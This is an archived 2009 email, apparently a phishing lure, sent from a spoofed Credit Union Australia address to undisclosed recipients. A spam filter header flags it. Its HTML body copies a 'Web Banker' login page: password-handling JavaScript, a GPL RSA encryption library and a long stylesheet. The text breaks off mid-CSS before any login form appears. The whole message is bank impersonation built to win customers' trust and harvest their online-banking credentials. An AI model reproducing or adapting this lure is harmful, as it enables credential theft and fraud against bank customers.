From info@cuabank.com.au  Mon Jun 22 02:38:28 2009
Return-Path: <info@cuabank.com.au>
X-Original-To: sc22wg5-dom7@www2.open-std.org
Delivered-To: sc22wg5-dom7@www2.open-std.org
Received: from open-std.org (pc.ihk-edu.dk [130.226.195.5])
	by www2.open-std.org (Postfix) with ESMTP id 2A984C178E5
	for <sc22wg5-dom7@www2.open-std.org>; Mon, 22 Jun 2009 02:38:28 +0200 (CET DST)
X-Greylist: delayed 740 seconds by postgrey-1.18 at pingo.cv.ihk.dk; Mon, 22 Jun 2009 00:38:11 UTC
Received: from sluiter-dc001.Sluiter.local (a80-127-189-66.adsl.xs4all.nl [80.127.189.66])
	by open-std.org (Postfix) with ESMTP id D7F3EDA201
	for <sc22wg5-dom7@www2.open-std.org>; Mon, 22 Jun 2009 00:37:51 +0000 (UTC)
Received: from User ([67.220.198.210]) by sluiter-dc001.Sluiter.local with Microsoft SMTPSVC(6.0.3790.3959);
	 Mon, 22 Jun 2009 02:21:08 +0200
From: "C U A" <info@cuabank.com.au>
Subject: Credit Union Australia 
Date: Mon, 22 Jun 2009 03:25:49 +0300
MIME-Version: 1.0
Content-Type: text/html;
	charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Message-ID: <SLUITER-DC001JWGYdR00000868@sluiter-dc001.Sluiter.local>
X-OriginalArrivalTime: 22 Jun 2009 00:21:09.0484 (UTC) FILETIME=[576022C0:01C9F2CF]
X-TM-AS-Product-Ver: SMEX-7.5.0.1243-5.6.1016-16718.003
X-TM-AS-Result: Yes-40.381900-5.000000-31
X-TM-AS-User-Approved-Sender: No
X-TM-AS-User-Blocked-Sender: No
To: undisclosed-recipients: ;

<html>
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
        <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
        <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
        <title>Web Banker </title>
        <script type="text/javascript">
            function _errmsg(){
                if (document.forms["Date"].elements["errmsg"].value.length > 0) {
                    alert(document.forms["Date"].elements["errmsg"].value)
                }
				nosub='';
	            result=true;
	            submitted=false;
            }
            
            function getEvent(e) {
            	return (typeof(e) == "undefined") ? window.event : e;
            }
            
            function eventTarget(e) {
            	return (typeof(e.target) == "undefined" ? e.srcElement : e.target);
            }
            
            function _over(e) {
            	e = getEvent(e);
            	elem = eventTarget(e);
            	if (elem.nodeName == "#text")
            	  elem = elem.parentNode;
            	cls = elem.className;
            	if (cls != "" && (cls.charAt(cls.length-1) == "_" || 
            			  cls.indexOf("_ ") > -1)) {
            		arr = cls.split(" ");
            		str = "";
            		for (var i=0; i<arr.length;i++) {
            			cls = arr[i];
            			if (cls.charAt(cls.length-1) == '_') {
            				str=str+" "+cls;
            				cls = cls+"o";
            			}
            			str = str+" "+cls;
            		}
            		elem.className = str.substring(1,str.length);
            	}
            	return true;
            }
            
            function _out(e) {
            	e = getEvent(e);
            	elem = eventTarget(e);
            	if (elem.nodeName == "#text")
            	  elem = elem.parentNode;
            	cls = elem.className;
            	if (cls != "" && (cls.indexOf("_o") == cls.length - 2 || 
            			  cls.indexOf("_o ") > -1)) {
            		arr = cls.split(" ");
            		str = "";
            		for (var i=0; i<arr.length;i++) {
            			cls = arr[i];
            			if (cls.length < 2 || cls.indexOf("_o") != cls.length-2) 
            				str=str+" "+cls;
            		}
            		elem.className = str.substring(1,str.length);
            	}
            	return true;
            }
            function confirmSub(elem, msg) {
            	result = confirm(msg);
            	nosub = result ? '' : elem.id;
            	return result;
            }
            
            function _click(e) {
            	e = getEvent(e);
            	elem = eventTarget(e);
            	if (elem.nodeName == "#text")
            	  elem = elem.parentNode;
            	bid = elem.id;
            	if (elem.value!="Close" && elem.value!="Help" && elem.value!="Export" && elem.value!="Print" && elem.value!="Download" && elem.value!="View") {
            	if (!submitted) { 
            		if ((elem.type == "submit" || elem.type == "image") && result ) { submitted = true; }
            		if (bid != nosub && bid.length>3 && bid.substring(0,3) == 'bu_') 	subWith(bid);
            	} else { if (elem.type == "submit" || elem.type == "image") {alert('Your previous request is processing.  Please wait.'); return false; }}}
            }
            
            function subW2(bid) {
            	frm = document.forms["SSF"];
            	frm.action = frm.action + "&wid=" + bid;
            	frm.submit();
            }
            
            function _exit() {
              frm = document.forms["SSF"];
              win = open( frm.action + "&exit", "exit")
              win.close()
            }
            
            document.onclick=_click;
            document.onmouseover=_over;
            document.onmouseout=_out;
            document.onunload=_exit;
            
            /* The following functions are (c) 2000 by John M Hanna and are
             * released under the terms of the Gnu Public License.
             * You must freely redistribute them with their source -- see the
             * GPL for details.
             *  -- Latest version found at http://sourceforge.net/projects/shop-js
             */
            bs=28;
            bx2=1<<bs; bm=bx2-1; bx=bx2>>1; bd=bs>>1; bdm=(1 << bd) -1
            log2=Math.log(2)
            
            
            function badd(a,b) {
             var al=a.length, bl=b.length
             if(al < bl) return badd(b,a)
             var c=0, r=[], n=0
             for(; n<bl; n++) {
              c+=a[n]+b[n]
              r[n]=c & bm
              c>>>=bs
             }
             for(; n<al; n++) {
              c+=a[n]
              r[n]=c & bm
              c>>>=bs
             }
             if(c) r[n]=c
             return r
            }
            function beq(a,b) {
             if(a.length != b.length) return 0
             for(var n=a.length-1; n>=0; n--)
              if(a[n] != b[n]) return 0
             return 1
            }
            function bsub(a,b) {
             var al=a.length, bl=b.length, c=0, r=[]
             if(bl > al) {return []}
             if(bl == al) {
              if(b[bl-1] > a[bl-1]) return []
              if(bl==1) return [a[0]-b[0]]
             }
             for(var n=0; n<bl; n++) {
              c+=a[n]-b[n]
              r[n]=c & bm
              c>>=bs
             }
             for(;n<al; n++) {
              c+=a[n]
              r[n]=c & bm
              c>>=bs
             }
             if(c) {return []}
             if(r[n-1]) return r
             while(n>1 && r[n-1]==0) n--;
             return r.slice(0,n)
            }
            function bmul(a,b) {
             b=b.concat([0])
             var al=a.length, bl=b.length, r=[], n,nn,aa, c, m
             var g,gg,h,hh, ghhb
            
             for(n=al+bl; n>=0; n--) r[n]=0
             for(n=0; n<al; n++) {
              if(aa=a[n]) {
               c=0
               hh=aa>>bd; h=aa & bdm
               m=n
               for(nn=0; nn<bl; nn++, m++) {
            	g = b[nn]; gg=g>>bd; g=g & bdm
            	//(gg*2^15 + g) * (hh*2^15 + h) = (gghh*2^30 + (ghh+hgg)*2^15 +hg)
            	ghh = g * hh + h * gg
            	ghhb= ghh >> bd; ghh &= bdm
            	c += r[m] + h * g + (ghh << bd)
            	r[m] = c & bm
            	c = (c >> bs) + gg * hh + ghhb
               }
              }
             }
             n=r.length
             if(r[n-1]) return r
             while(n>1 && r[n-1]==0) n--;
             return r.slice(0,n)
            }
            
            function blshift(a,b) {
             var n, c=0, r=[]
             for(n=0; n<a.length; n++) {
              c|= (a[n]<<b) 
              r[n]= c & bm
              c>>=bs
             }
             if(c) r[n]=c
             return r
            }
            function brshift(a) {
             var c=0,n,cc, r=[]
             for(n=a.length-1; n>=0; n--) {
              cc=a[n]; c<<=bs
              r[n]=(cc | c)>>1
              c=cc & 1
             }
             while(r.length > 1 && r[r.length-1]==0) {
              r=r.slice(0,-1)
             }
             this.a=r; this.c=c
             return this
            }
            function zeros(n) {var r=[]; while(n-->0) r[n]=0; return r}
            function toppart(x,start,len) { var n=0
             while(start >= 0 && len-->0) n=n*bx2+x[start--]
             return n
            }
            function bdiv(x,y) {
             var n=x.length-1, t=y.length-1, nmt=n-t
             if(n < t || n==t && (x[n]<y[n] || n>0 && x[n]==y[n] && x[n-1]<y[n-1])) {
              this.q=[0]; this.mod=x; return this
             }
             if(n==t && toppart(x,t,2)/toppart(y,t,2) <4) {
              var q=0, xx
              for(;;) {
               xx=bsub(x,y)
               if(xx.length==0) break
               x=xx; q++
              }
              this.q=[q]; this.mod=x; return this
             }
             var shift, shift2
             shift2=Math.floor(Math.log(y[t])/log2)+1
             shift=bs-shift2
             if(shift) {
              x=x.concat(); y=y.concat()
              for(i=t; i>0; i--) y[i]=((y[i]<<shift) & bm) | (y[i-1] >> shift2); y[0]=(y[0]<<shift) & bm
              if(x[n] & ((bm <<shift2) & bm)) { x[++n]=0; nmt++; }
              for(i=n; i>0; i--) x[i]=((x[i]<<shift) & bm) | (x[i-1] >> shift2); x[0]=(x[0]<<shift) & bm
             }
             var i, j, x2, y2,q=zeros(nmt+1)
            
             y2=zeros(nmt).concat(y)
             for(;;) {
              x2=bsub(x,y2)
              if(x2.length==0) break
              q[nmt]++
              x=x2
             }
             var yt=y[t], top=toppart(y,t,2)
             for(i=n; i>t; i--) {
              m=i-t-1
              if(i >= x.length)
               q[m]=1
              else if(x[i] == yt)
               q[m]=bm
              else
               q[m]=Math.floor(toppart(x,i,2)/yt)
            
              topx=toppart(x,i,3)
              while(q[m] * top > topx)
               q[m]--
              y2=y2.slice(1)
              x2=bsub(x,bmul([q[m]],y2))
              if(x2.length==0) {
               q[m]--
               x2=bsub(x,bmul([q[m]],y2))
              }
              x=x2
             }
             if(shift) {
              for(i=0; i<x.length-1; i++) x[i]=(x[i]>>shift) | ((x[i+1] << shift2) & bm); x[x.length-1]>>=shift
             }
             while(q.length > 1 && q[q.length-1]==0) q=q.slice(0,q.length-1)
             while(x.length > 1 && x[x.length-1]==0) x=x.slice(0,x.length-1)
             this.mod=x
             this.q=q
             return this
            }
            
            function bmod(p,m) {
             if(m.length==1) {
              if(p.length==1) return [p[0] % m[0]]
              if(m[0] < bdm) return [simplemod(p,m[0])]
             }
            
             var r=bdiv(p,m)
             return r.mod
            }
            function simplemod(i,m) {
             if(m>bdm)
              return mod(i,[m])
             var c=0, v
             for(var n=i.length-1; n>=0; n--) {
              v=i[n]
              c=((v >> bd) + (c<<bd)) % m
              c=((v & bdm) + (c<<bd)) % m
             }
             return c
            }
            function bmodexp(xx,y,m) {
             var r=[1], n, an,a, x=xx.concat()
             var mu=[]
             n=m.length*2;  mu[n--]=1;  for(; n>=0; n--) mu[n]=0; mu=bdiv(mu,m).q
            
             for(n=0; n<y.length; n++) {
              for(a=1, an=0; an<bs; an++, a<<=1) {
               if(y[n] & a) r=bmod2(bmul(r,x),m,mu)
               x=bmod2(bmul(x,x),m,mu)
              }
             }
             return r
            }
            function bmod2(x,m,mu) {
             var xl=x.length - (m.length << 1)
             if(xl > 0) {
              return bmod2(x.slice(0,xl).concat(bmod2(x.slice(xl),m,mu)),m,mu)
             }
             var ml1=m.length+1, ml2=m.length-1,rr
             var q3=bmul(x.slice(ml2),mu).slice(ml1)
             var r1=x.slice(0,ml1)
             var r2=bmul(q3,m).slice(0,ml1)
             var r=bsub(r1,r2)
             if(r.length==0) {
              r1[ml1]=1
              r=bsub(r1,r2)
             }
             for(var n=0;;n++) {
              rr=bsub(r,m)
              if(rr.length==0) break
              r=rr
              if(n>=3) return bmod2(r,m,mu)
             }
             return r
            }
            
            function sub2(a,b) {
             var r=bsub(a,b)
             if(r.length==0) {
              this.a=bsub(b,a)
              this.sign=1
             } else {
              this.a=r
              this.sign=0
             }
             return this
            }
            function signedsub(a,b) {
             if(a.sign) {
              if(b.sign) {
               return sub2(b,a)
              } else {
               this.a=badd(a,b)
               this.sign=1
              }
             } else {
              if(b.sign) {
               this.a=badd(a,b)
               this.sign=0
              } else {
               return sub2(a,b)
              }
             }
             return this
            }
            
            function modinverse(x,n) {
             var y=n.concat(), t, r, bq, a=[1], b=[0], ts
             a.sign=0; b.sign=0
             while( y.length > 1 || y[0]) {
              t=y.concat()
              r=bdiv(x,y)
              y=r.mod
              q=r.q
              x=t
              t=b.concat(); ts=b.sign
              bq=bmul(b,q)
              bq.sign=b.sign
              r=signedsub(a,bq)
              b=r.a; b.sign=r.sign
              a=t; a.sign=ts
             }
             if(beq(x,[1])==0) return [0]
             if(a.sign) {
              a=bsub(n,a)
             }
             return a
            }
            
            function crt_RSA(m, d, p, q) {
             var xp = bmodexp(bmod(m,p), bmod(d,bsub(p,[1])), p)
             var xq = bmodexp(bmod(m,q), bmod(d,bsub(q,[1])), q)
             var t=bsub(xq,xp);
             if(t.length==0) {
              t=bsub(xp,xq)
              t = bmod(bmul(t, modinverse(p, q)), q);
              t=bsub(q,t)
             } else {
              t = bmod(bmul(t, modinverse(p, q)), q);
             } 
             return badd(bmul(t,p), xp)
            }
            
            function t2b(s) {
             var bits=s.length*8, bn=1, r=[0], rn=0, sn=0, sb=1;
             var c=s.charCodeAt(0)
             for(var n=0; n<bits; n++) {
              if(bn > bm) {bn=1; r[++rn]=0; }
              if(c & sb)  r[rn]|=bn;
              bn<<=1
              if((sb<<=1) > 255) {sb=1; c=s.charCodeAt(++sn); }
             }
             return r;
            }
            function b2t(b) {
             var bits=b.length*bs, bn=1, bc=0, r=[0], rb=1, rn=0
             for(var n=0; n<bits; n++) {
              if(b[bc] & bn) r[rn]|=rb;
              if((rb<<=1) > 255) {rb=1; r[++rn]=0; }
              if((bn<<=1) > bm) {bn=1; bc++; }
             }
             while(r[rn]==0) {rn--;}
             var rr=''
             for(var n=0; n<=rn; n++) rr+=String.fromCharCode(r[n]);
             return rr;
            }
            b64s='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"'
            function textToBase64(t) {
             var r=''; var m=0; var a=0; var tl=t.length-1; var c
             for(n=0; n<=tl; n++) {
              c=t.charCodeAt(n)
              r+=b64s.charAt((c << m | a) & 63)
              a = c >> (6-m)
              m+=2
              if(m==6 || n==tl) {
               r+=b64s.charAt(a)
               if((n%45)==44) {r+="\n"}
               m=0
               a=0
              }
             }
             return r
            }
            //function rsaEncode(key,mod,text) {
            // return textToBase64(b2t(bmodexp(t2b(text+String.fromCharCode(0,2)),key,mod)))
            //}
            function encWid(key,mod,frm,spid,wn) {
             wid=frm.elements[wn]
             rndm=frm.elements[spid].value
             clr=rndm.substr(11,8) + wid.value
             if (wid.value.length>0) {
              frm.elements[wn+"_RSA"].value=textToBase64(b2t(bmodexp(t2b(clr+String.fromCharCode(0,2)),key,mod)))
              wid.value = ""
             }
            }
            nosub='';
            	var selectedInput;
            
            	function setSelectedInputByClick(field) {
            		// Do nothing.
            	}
            
            	function setSelectedInput(field) {
            	  selectedInput = field;
            	}
            
            	function enterNum(padButton) {
            	  if (selectedInput != null) {
            	   selectedInput.value = selectedInput.value + padButton.value;
            	  }
            	}
            
            	function clearField() {
            	  if (selectedInput != null) {
            		selectedInput.value = "";
            	  }
            	}
            
            	function delField() {
            	  if (selectedInput != null && selectedInput.value.length > 0) {
            		selectedInput.value = selectedInput.value.substring(0, selectedInput.value.length - 1);
            	  }
            	}
            
            	function readyScramblePad() {
            		setSelectedInput(document.forms["Date"].elements["txtPassword"]);
            	}
                    
        </script>
        <style type="text/css">
            .dmy {
            }
            
            BODY {
                font-size: 8pt;
                font-family: Verdana, Arial, 'sans serif';
                color: black;
                background: white;
                border: 0px;
                margin: 0px;
                text-align: center
            } .btn_ {
                font-size: 8pt;
                font-weight: bold;
                text-align: center;
                border-style: solid;
                border-width: 1px;
                border-color: #808080 #606060 #606060 #808080;
                color: #FFFFFF;
                background-color: #00A6B6;
                cursor: hand;
                vertical-align: middle;
                height: 22px;
                padding: 2px 0.25em 4px 0.25em;
                margin: 1px 2px;
                padding-left: 0.25em;
                padding-right: 0.25em;
                padding-top: 2px;
                padding-bottom: 4px
            } .btndf {
            } .btnd {
                font-weight: normal;
                text-align: center;
                border-style: solid;
                border-width: 1px;
                border-color: #808080 #606060 #606060 #808080;
                color: #606060;
                background-color: #E0E0E0;
                vertical-align: middle;
                height: 22px;
                padding: 3px 2.125em;
                margin: 1px 2px 1px 2px;
                font-size: 8pt
            } .btn_o {
                background-color: #136C75;
                color: #FFFFFF;
                border-color: #808080
            } .flt {
                border: 1px solid #136C75;
                width: 100%;
                padding: 0;
                font-size: 8pt;
                font-weight: normal
            } .flr {
                background-color: #FFFFFF
            } .flro {
                background-color: #E5E3E3
            } .flrs {
                background-color: #99CCCC
            } .flh {
                color: #FFFFFF;
                background-color: #00A6B6;
                font-weight: bold;
                text-align: center;
                border-right: 1px solid #136C75;
                border-bottom: 1px solid #136C75;
                font-size: 8pt
            } .flhl {
                color: #FFFFFF;
                background-color: #00A6B6;
                font-weight: bold;
                text-align: center;
                border-bottom: 1px solid #136C75;
                font-size: 8pt
            } .flh_ {
                color: #FFFFFF;
                background-color: #00A6B6;
                font-weight: bold;
                text-align: center;
                border-right: 1px solid #136C75;
                border-bottom: 1px solid #136C75;
                cursor: hand;
                font-size: 8pt
            } .flhl_ {
                color: #FFFFFF;
                background-color: #00A6B6;
                font-weight: bold;
                text-align: center;
                border-bottom: 1px solid #136C75;
                cursor: hand;
                font-size: 8pt
            } .flhb_ {
                color: #FFFFFF;
                background-color: #00A6B6;
                font-weight: bold;
                text-align: center;
                border-width: 0;
                cursor: hand;
                margin: 0;
                padding: 0;
                font-size: 8pt;
                width: 100%
            } .flh_o {
                background-color: #136C75;
                color: #FFFFFF;
                font-size: 8pt
            } .flhs {
                font-style: italic
            } .flre {
                border: 1px solid #000000;
                background-color: #FFFFFF
            } .fltl {
                color: #00008F;
                background-color: #e0e0e0;
                font-weight: bold;
                text-align: center;
                border-right: 1px solid #136C75;
                border-bottom: 1px solid #136C75
            } .flc {
                border-right: 1px solid #136C75;
                padding-left: 0.25em;
                padding-right: 0.25em;
                font-size: 8pt;
                color: #000000
            } .flcl {
                padding-left: 0.25em;
                padding-right: 0.25em;
                font-size: 8pt;
                color: #000000
            } .flbtc {
                border-right: 1px solid #136C75;
                padding: 1px;
                white-space: nowrap
            } .flbtcl {
                padding: 1px;
                white-space: nowrap;
                color: #000000
            } .flb_ {
                font-size: 8pt;
                font-weight: bold;
                text-align: center;
                color: #FFFFFF;
                background-color: #00A6B6;
                cursor: hand;
                border-style: solid;
                border-width: 1px;
                border-color: #136C75;
                padding: 0;
                margin: 0 1px
            } .flb_o {
                background-color: #136C75;
                color: #FFFFFF;
                border-color: #00A6B6
            } .flsu_ {
                width: 15px;
                border: 1px solid white;
                cursor: hand;
                background-color: white;
                font-size: 8pt
            } .flsu_o {
                border-color: #808080
            } .flsud {
                width: 15px;
                height: 12px;
                border: 1px solid white;
                background-color: white;
                font-size: 8pt
            } .flsd_ {
                width: 15px;
                border: 1px solid white;
                cursor: hand;
                background-color: white;
                font-size: 8pt
            } .flsd_o {
                border-color: #808080
            } .flsdd {
                width: 15px;
                height: 12px;
                border: 1px solid white;
                background-color: white;
                font-size: 8pt
            } .flsm {
                background-color: white;
                font-size: 8pt;
                text-align: center
            } .c {
                text-align: center
            } .r {
                text-align: right
            } .l {
                text-align: left
            } .i {
                font-style: italic
            }
            
            FORM {
                margin-top: 0
            } .msgbox {
                background-color: white;
                border: 2px solid #136C75;
                padding: 0 0.25em
            } .errmsg {
                font-size: 14pt;
                font-weight: normal;
                color: red;
                background-color: white
            } .statmsg {
                font-size: 12pt;
                font-weight: bold;
                color: #136C75
            }
            
            h3 {
                text-align: center;
                margin: 0.25em 0;
                color: #136C75
            }
            
            h4 {
                text-align: center;
                margin: 0.25em 0;
                color: #136C75
            } .toprhbtns {
                text-align: left;
                font-weight: normal;
                background-color: #FFFFFF
            } .toprhbtns .btn_ {
                margin: 0.25em 0 0 0.25em;
                width: 100%
            } .toprhbtns form {
                margin: 0;
                padding: 0 2px 0 0
            } .header {
            } .header TD {
                bottom-margin: 3px
            } .maintbl {
                padding: 0;
                width: 750px;
                text-align: center;
                margin: auto
            } .logo {
                width: 0px;
                text-align: center
            }
            
            IMG.logo {
                width: 0px;
                height: 60px
            } .banner {
                width: 700px;
                height: 66px;
                text-align: center;
                font-size: medium;
                color: #c0c0c0;
                background-color: white
            } .sid {
                text-align: right;
                font-size: 7pt;
                font-weight: bolder
            } .mainpage {
                text-align: center;
                width: 100%;
                background-color: #E5E3E3;
                border: 1px solid #136C75
            } .entryarea {
                width: 100%
            } .lbl {
                font-size: 8pt;
                font-weight: bolder;
                padding: 0.25em 1em 0 130px;
                width: 40%;
                white-space: nowrap;
                vertical-align: 5%;
                color: 136C75
            } .lbl2 {
                font-size: 8pt;
                font-weight: bolder;
                padding: 0.25em 1.5em 0 3em;
                white-space: nowrap;
                vertical-align: 5%;
                color: #136C75
            } .val {
                font-size: 8pt;
                padding: 0.25em 0 0 0;
                margin-left: 0.5em;
                margin-right: 0.5em;
                white-space: nowrap
            } .val input {
                margin-right: 1em;
                font-size: 8pt
            } .val select {
                margin-right: 1em;
                font-size: 8pt
            } .exemplar {
                font-size: 8pt;
                text-align: left;
                font-weight: bolder;
                padding: 0;
                margin: 0;
                white-space: nowrap;
                vertical-align: 4px;
                color: #136C75
            } .exptext {
                font-size: 8pt;
                font-weight: normal;
                text-align: center;
                padding: 0.5em 1em 0.25em 1em;
                color: #000000
            } .btndesc {
                font-size: 8pt;
                font-weight: normal;
                text-align: center;
                padding: 0.25em 1em;
                color: #000000
            } .pgbtns {
                text-align: center
            } .linkbtn_ {
                color: blue;
                background-color: transparent;
                text-decoration: underline;
                border-width: 0;
                font-size: 8pt;
                font-weight: bold;
                text-align: left;
                padding: 0em 0 0 0;
                overflow: visible
            } .linkbtn_o {
                color: orange;
                background-color: transparent;
                text-decoration: none;
                border-width: 0;
                font-size: 8pt;
                font-weight: bold;
                text-align: left;
                padding: 0em 0 0 0;
                overflow: visible
            } .btbl {
                width: 100%;
                text-align: center
            } .pgbtns .btn_ {
                margin: auto 0.25em
            } .pgbtns .btnd {
                margin: auto 0.25em
            } .btnprintdiv {
            } .btnhelpdiv {
            } .btnlogoffdiv {
            } .flhb_o {
                color: #FFFFFF;
                background-color: #136C75 font-size: 8pt
            } .instruction1 {
                text-align: left;
                font-size: 8pt;
                font-weight: normal;
                padding: 0.5em 1em 0.25em 1em
            } .instruction2 {
                text-align: left;
                font-size: 8pt;
                font-weight: normal;
                padding: 0.5em 1em 0.25em 1em
            } .lblLeft {
                text-align: left;
                font-size: 8pt;
                font-weight: bolder;
                padding: 0.25em 1em 0 30px;
                white-space: nowrap;
                vertical-align: 5%
            } #BL04 .lbl {
                padding-left: 30px;
                width: 30%;
                white-space: normal
            } #BL04 .exemplar {
                display: block;
                white-space: normal
            } .bannerLogon {
                height: 60px;
                width: 648px;
                text-align: center;
                background-color: white
            }
            
            IMG.banner {
                width: 648px;
                height: 60px
            } .mktg {
                border: 1px solid #136C75;
                font-size: 14pt;
                font-weight: normal;
                padding: 20px 50px 20px 50px;
                background-color: #00A6B6;
                vertical-align: middle;
                text-align: center;
                margin: 0 0 10px 0;
                color: #FFFFFF
            } .cpy {
                color: #b0b0b0;
                font-size: xx-small;
                text-align: left;
                padding: 2em 0 0 1em
            } .sctbl {
                border: 1px;
                border-style: solid;
                padding: 0;
                margin: 0;
                border-color: #000080
            } .sct {
                background-color: #FFFFCC;
                border-top: solid 1px #000080;
                border-right: solid 1px #000080;
                border-left: solid 1px #000080;
                width: 1.25em;
                text-align: center
            } .scb {
                background-color: #FFFFCC;
                border-right: solid 1px #000080;
                border-bottom: solid 1px #000080;
                border-left: solid 1px #000080;
                width: 1.25em;
                text-align: center;
                font-weight: bold
            } .sctable {
                border: 1px;
                border-style: solid;
                padding: 0;
                margin: 0;
                border-color: #FFFFFF;
                background-color: #FFFFFF
            } .scbtn_ {
                width: 50px;
                font-family: Microsoft Sans Serif;
                font-size: 8pt;
                color: #000000;
                font-weight: bold;
                PADDING-RIGHT: 0.25em;
                PADDING-LEFT: 0.25em;
                PADDING-BOTTOM: 2px;
                MARGIN: 1px 2px;
                VERTICAL-ALIGN: top;
                OVERFLOW: visible;
                WIDTH: 2em;
                CURSOR: hand;
                PADDING-TOP: 2px;
                HEIGHT: 22px;
                TEXT-ALIGN: center;
                text-align: center
            } .scbtn_o {
                width: 50px;
                font-family: Microsoft Sans Serif;
                font-size: 8pt;
                color: #000000;
                font-weight: bold;
                PADDING-RIGHT: 0.25em;
                PADDING-LEFT: 0.25em;
                PADDING-BOTTOM: 2px;
                MARGIN: 1px 2px;
                VERTICAL-ALIGN: top;
                OVERFLOW: visible;
                WIDTH: 2em;
                CURSOR: hand;
                PADDING-TOP: 2px;
                HEIGHT: 22px;
                TEXT-ALIGN: center;
                text-align: center
            } .scotherbtn_ {
                width: 50px;
                font-family: Microsoft Sans Serif;
                font-size: 8pt;
                color: #000080;
                font-weight: bold
            } .scotherbtn_o {
                width: 50px;
                font-family: Microsoft Sans Serif;
                font-size: 8pt;
                color: #000080;
                font-weight: bold
            } .scrowb_ {
                BACKGROUND-COLOR:: #e2e3e5;
            
            text-align:left;
            
            border:
                1px
            
            solid #000080
            } .scbtnenter_ {
                font-family: Microsoft Sans Serif;
                font-size: 8pt;
                color: #000000;
                font-weight: bold;
                width: 160px;
                text-align: center
            } .cpy {
                color: #b0b0b0;
                font-size: xx-small;
                text-align: right;
                padding: 2em 0 0 1em
            } .cpybtn_ {
                color: #b0b0b0;
                background-color: transparent;
                text-decoration: underline;
                border-width: 0;
                font-size: xx-small;
                text-align: left;
                padding: 2em 0 0 0;
                overflow: visible
            } .cpybtn_o {
                color: #b0b0b0;
                background-color: transparent;
                text-decoration: none;
                border-width: 0;
                font-size: xx-small;
                text-align: left;
                padding: 2em 0 0 0;
                overflow: visible
            } .cpylink {
                color: #b0b0b0;
                font-size: xx-small
            } .sctable {
                border: 1px;
                border-style: solid;
                padding: 0;
                margin: 0;
                border-color: #000080
            } .scbtn_ {
                width: 50px;
                text-align: center
            } .scbtn_o {
                width: 50px;
                text-align: center
            } .cpy {
                color: #b0b0b0;
                font-size: xx-small;
                text-align: right;
                padding: 2em 0 0 1em
            } .cpybtn_ {
                color: #b0b0b0;
                background-color: transparent;
                text-decoration: underline;
                border-width: 0;
                font-size: xx-small;
                text-align: left;
                padding: 2em 0 0 0;
                overflow: visible
            } .cpybtn_o {
                color: #b0b0b0;
                background-color: transparent;
                text-decoration: none;
                border-width: 0;
                font-size: xx-small;
                text-align: left;
                padding: 2em 0 0 0;
                overflow: visible
            } .cpylink {
                color: #b0b0b0;
                font-size: xx-small
            } .sctable {
                border: 1px;
                border-style: solid;
                padding: 0;
                margin: 0;
                border-color: #000080
            } .scbtn_ {
                width: 50px;
                text-align: center
            } .scbtn_o {
                width: 50px;
                text-align: center
            } .promo {
                font-size: 8pt;
                color: #000000;
                border: 1px solid grey;
                background-color: white;
                margin: 1em;
                padding: 2em
            } .tandcs {
                font-size: 8pt;
                color: #000000;
                border: 1px solid grey;
                background-color: white;
                margin: 1em;
                padding: 2em
            } .mailBody {
                padding: 10px;
                border: #101010 1px solid;
                background-color: white;
                font-size: 10pt;
                text-align: left
            } .ntbk {
                border-width: 0;
                padding: 0;
                margin: 2px 1px;
                background-color: transparent
            } .nbv_ {
                font-size: 8pt;
                font-weight: bold;
                text-align: center;
                white-space: nowrap;
                border-style: solid;
                border-color: #101010;
                cursor: not-allowed;
                padding: 2px 1.5em;
                border-width: 1px 1px 0px 1px;
                color: #136C75;
                background-color: #FFFFFF;
                margin: 0
            } .nbh_ {
                font-size: 8pt;
                font-weight: bold;
                text-align: center;
                white-space: nowrap;
                border-style: solid;
                border-color: #101010;
                cursor: hand;
                padding: 2px 0.75em;
                color: #FFFFFF;
                background-color: #136C75;
                border-width: 1px;
                margin: 0
            } .nbv_o {
                cursor: not-allowed
            } .nbh_o {
                color: #FFFFFF;
                background-color: #00A6B6;
                border-bottom-color: #808080
            } .nbsep_ {
                background-color: transparent;
                border-style: solid;
                border-width: 0px 0px 1px 0px;
                border-color: #101010
            } .nbseprem {
                background-color: transparent;
                border-style: solid;
                border-width: 0px 0px 1px 0px;
                border-color: #101010;
                width: 750
            } .nbpg_ {
                padding: 0.25em;
                background-color: white;
                border-style: solid;
                border-width: 0px 1px 1px 1px;
                border-color: 101010
            } .resize {
                font-size: 8pt;
                float: right;
                color: #000000
            } .listsize {
                font-size: 8pt
            } #AM01top {
                width: 100%;
                margin: 3px 0 5px 0
            } #AM01warn {
                border-top-width: 0
            } #AM01warn TH {
                border-width: 0;
                color: red;
                background-color: white
            } #AM01inbox {
                vertical-align: top
            } #AM01trans {
                vertical-align: top
            } #AM01trans TD {
                font-size: 8pt;
                white-space: nowrap
            } .acctdtls {
                width: 100%;
                border: solid 1px #808080;
                margin: 8px 0 3px 0;
                background-color: #99CCCC
            } .acctdtls TD {
                padding: 2px 0.25em
            } .accthdg {
                font-size: 8pt;
                font-weight: bolder;
                text-align: left;
                line-height: 7pt;
                color: #000000
            } .acctbtns {
                text-align: right;
                vertical-align: top
            } .acctnum {
                font-size: 8pt;
                font-weight: bold;
                text-align: left;
                white-space: nowrap;
                vertical-align: top;
                color: #000000
            } .acctinfo {
                font-size: 8pt;
                font-weight: normal;
                text-align: left;
                vertical-align: top
            } .defacct {
                white-space: nowrap;
                font-weight: bold;
                text-align: left
            } .infoline {
                display: list;
                color: #000000
            } .lblos {
                font-size: 8pt;
                padding: 0;
                text-align: left;
                color: #000000
            } .full {
                width: 100%
            } .btnareaos {
                width: 60%
            } .btnos {
                width: 35%;
                padding-left: 100px
            } .inpsel {
                margin-right: 3em;
                font-size: 7pt;
                border-style: solid;
                border-width: 2px;
                border-color: #101010
            } .scbtnenter_ {
                width: 160px;
                text-align: center
            } .scbtnenter_o {
                width: 160px;
                text-align: center;
                color: #000000
            } .sessDtls {
                padding: 10px;
                border: #101010 1px solid;
                background-color: white;
                font-size: 8pt;
                text-align: left
            }
            
            sessDtls {
                padding: 10px;
                border: #101010 1px solid;
                background-color: white;
                font-size: 8pt;
                text-align: left
            } .banner img {
                border: 0
            } .estMsg {
                font-size: 8pt;
                font-weight: normal;
                text-align: center;
                padding: 0.25em 1em;
